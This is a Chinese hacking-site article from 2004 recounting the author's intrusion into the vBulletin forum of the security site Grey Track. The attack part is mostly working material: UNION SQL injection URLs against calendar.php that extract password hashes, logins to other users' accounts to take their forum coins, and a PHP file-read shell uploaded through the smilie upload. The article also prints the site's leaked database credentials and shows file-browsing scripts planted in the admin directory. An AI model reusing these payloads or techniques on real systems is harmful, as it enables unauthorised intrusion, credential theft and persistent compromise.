首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
入侵灰色轨迹论坛
来源:vfocus.net 作者:不详 发布时间:2004-05-20  

入侵灰色轨迹论坛


灰色轨迹:一个人气很不错的黑客技术站点,也是当年培育我成长得地方。一日,闲来无事便想测试一下php脚本的安全性。所以就看了看灰色轨迹的VBB论坛。

因为是由于灰色论坛启发的学习之路,所以偶得先看看灰色论坛用得是版本的vbb了―――vBulletin Forum 2.3.0。 恩,就是这个,立刻找到了原文件看起来。一来就打开看到了日历文件这里有这么一段:
calendar。php,发现问题!
-------- 相关代码如下 ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid =
$eventid");
if ($eventinfo[userid] != $bbuserinfo[userid])
{
$permissions=getpermissions();
if ($permissions[canpublicedit]!=1) {
show_nopermission();
}
OK。我们可以看到eventid没有过滤。可以进行SQL INJECTION注射攻击。所以下面我们来构造句子进行注射。PHP+MYSQL的注射攻击条件比较难。由于MYSQL本身功能问题。限制了不少有用的注射方法。所以我们要完成注射就要找别的方法了。

如果论坛使用的MySQL版本在4.00以上,就可以进行UNION攻击。至于如何察看MYSQL版本就不多说了。利用注射就可以做到得。
攻击演示句子:
http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
此时query_first函数将只返回第一行的查询结果,如果存在漏洞。我们将看到MYSQL得版本和MYSQL得用户如果我们构造好。就可以得到数据库得任何内容。当然包括USER表中的密码
二.论坛攻击与测试过程
开始对灰色轨迹论坛进行测试:
http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
我们看到了结果:
4.0.2-alpha-nt -----------------出现在标题栏--------就是我们的user()函数
isgreyvbb@localhost ------------------------------事件内容里-----我们的version()函数
再来
http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
结果:
------------------------------------------------
看起来中新软件-灰色轨迹安全咨讯站技术讨论区数据库发生了一些微小的错误
请按浏览器的 刷新 按钮重试。
一封 E-Mail 已经发送给 技术支持信箱, 如果问题仍然存在,你也可以直接联系。

对给你造成的不便我们深表歉意。
―――――――――――――――――――――――――――
再来:
http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0',now(),database()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate

vbb----------数据库名字

http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0',user(),md5(123456)%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate10adc3949ba59abbe56e057f20f883e
哈哈........随便测试了几个函数.都成功了.但是我们怎么来取得密码呢?

*******************************************************************************
下面来构造取密码的句子:
恩,我们用UNION.UNION来看看。两张表字段要相等,类型要相似,满足条件非常简单。
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1) 
MySQL said:
The used SELECT statements have a different number of columns
恩,字段不相等,错误
********************************************************************************************
本地测试UNION句子:
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)allowsmilies public userid eventdate event subject Edit Delete 1 1 1 2000-00-01 welcomesay 6a204bd89f3c8348afd5c77c717a097a
恩。返回成功了,我们看到了想要得东西.密码.这里感谢一下兄弟小竹.注入过程以及构造过程中.他给了很大启发以及帮助.!~我们的句子就要这样构造就行了。

回到灰色论坛来:
*******************************************************************************
http://zerolu.vicp.net/calendar.php?s=&action=edit&eventid=11%20UNION%20(SELECT%201,0,2,񟬿-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate
哈哈!!!!!!!!!!成功.可以显示任何人密码了.哈哈!~测试成功!~
http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20UNION%20(SELECT%201,0,12695,񟬿-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate
哈哈.蓝骑士的密码拿来了.我们登陆看看.哼!~欢迎你回来:蓝骑士...............哈哈...........成功!~然后就进了银行.将他仅有的192个金币转走了.嘻!~接下来我们来取沙子得密码,先查他ID:
http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20UNION%20(SELECT%201,0,12695,񟬿-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate
这样就返回了ID号:6565-----------沙子得ID
查查SANDFLEE的USERID多少,哇,单引号也可以使用呀。
http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20UNION%20(SELECT%201,0,12695,񟬿-01-01',username,password%20FROM%20user%20WHERE%20userid=6565)%20order%20by%20eventdate
哈哈,USERID=6565的用户和密码出来了.!然后当然是登陆.偷他钱了.哼 ---------------欢迎你回来:Sandflee
用户名: Sandflee
总资产: 1582414
现金: 1
存款: 1582413
恩,先拿他100万了.给他留点
http://bbs.isgrey.com/showgroups.php 恩.来察看了一下管理员情况.有三个哦
本来是32位密码.去掉前后8位是16位的了.
sandflee --------------6565 d82f53035a0311f0
pskey -------13384 e429cd6be979bb0a
IpFilterImD ----9914 6a31ceb936eeef23
进入后台:
29175183 sandflee ----------破出的密码.呵呵.幸好是数字哦

来到表情符号上传那就可以开始上传PHP文件了.
另外要备份数据库也很简单.都是现成提供好的功能了.呵呵..........
然后我们写个小程序.<?readfile($heiye)?>
heiye.php
http://bbs.isgrey.com/images/smilies/heiye.php?a=..\..\admin\config.php
(呵呵..........MYSQL的用户和密码也来了.网页是不显示的.空白的.察看源代码就可以看到了)
/////////////////////////////////////////////////////////////
// Please note that if you get any errors when connecting, //
// that you will need to email your host as we cannot tell //
// you what your specific values are supposed to be //
/////////////////////////////////////////////////////////////

// type of database running
// (only mysql is supported at the moment)
$dbservertype='mysql'

// hostname or ip of server
$servername='localhost'

// username and password to log onto db server
$dbusername='isgreyvbb'
$dbpassword='bbq139'

// name of database
$dbname='vbb'

// technical email address - any error messages will be emailed here
$technicalemail='webmaster@isgrey.com'

// use persistant connections to the database
// 0 = don't use
// 1 = use
$usepconnect=0;

?>824

OK,看见MYSQL密码了,这里他限制外部连接了............呵呵...........
后来写了些小脚本上去,因为他禁止了调用CMD。只能利用PHP内部函数了.
http://bbs.isgrey.com/admin/temp3.php?c=dir&f=d:\
bbs mysql RECYCLER sandflee System Volume Information temp
http://bbs.isgrey.com/admin/temp3.php?c=dir&f=c:\Zxfirewall\
. .. config.ini drivers install install.bat InterfaceDLL.dll IPFControlService.exe
IPFMonitor.exe password.key systemfilters.txt uninstall.bat
http://bbs.isgrey.com/admin/temp3.php?c=file&f=c:\Zxfirewall\config.ini
server=127.0.0.1 18
http://bbs.isgrey.com/admin/temp3.php?c=file&f=c:\Zxfirewall\install.bat
ipfcontrolservice -i ipfcontrolservice -s 44
http://bbs.isgrey.com/admin/temp3.php?c=file&f=c:\Zxfirewall\systemfilters.txt
; For test only
允许自己用ping命令探测其他机器 Filter { name = 允许自己用ping命令探测其他机器
description = 防止别人用ping命令探测 protocol = ICMP ICMP_Type = 0 receive pass }
防止别人用ping命令探测 Filter { name = 防止别人用ping命令探测 description = 防止别人用ping命令
探测 protocol = ICMP icmp_type = 8 receive } HTTP protocol filter { name = 禁止HTTP协议(80端口) description = 禁止HTTP协议(80端口) protocol = TCP tcp_remoteport = 80 send receive } 513 恩..........看了些文件.没意思了.现在就能改论坛首页了.不过我们的目的是检测.没有破坏的意思.所以就没有做了.毕竟对灰色有感情。
后来就找了个帮助页,插进了我们的代码,走人了.由于之前有点感情.所以没给他改页.呵呵.

三.总结:
PHP注入的确比ASP难得多。不过,多去研究发现,很多问题还是存在的。比ASP注入攻击等有意思多了。希望这篇PHP注入的文章能带给大家一些新的攻击注入思路。



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·克隆/删除任意用户(RingZ_CDUse
·Backup a shell
·桂林老兵的SQLSERVER高级注入技
·Chinaren脚本注入式攻击(1)
·免FSO的CMD.ASP带回显
·or1=1等漏洞问题
·通过乔客(Joekoe)看过滤空格的突
·文件上传漏洞在惠信中的应用
·巧用asp木马和KV2004得到管理员
·动网论坛上传文件漏洞的原理以及
·SQL注入的不常见方法
·动网和动力文章系统打印页面SQL
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved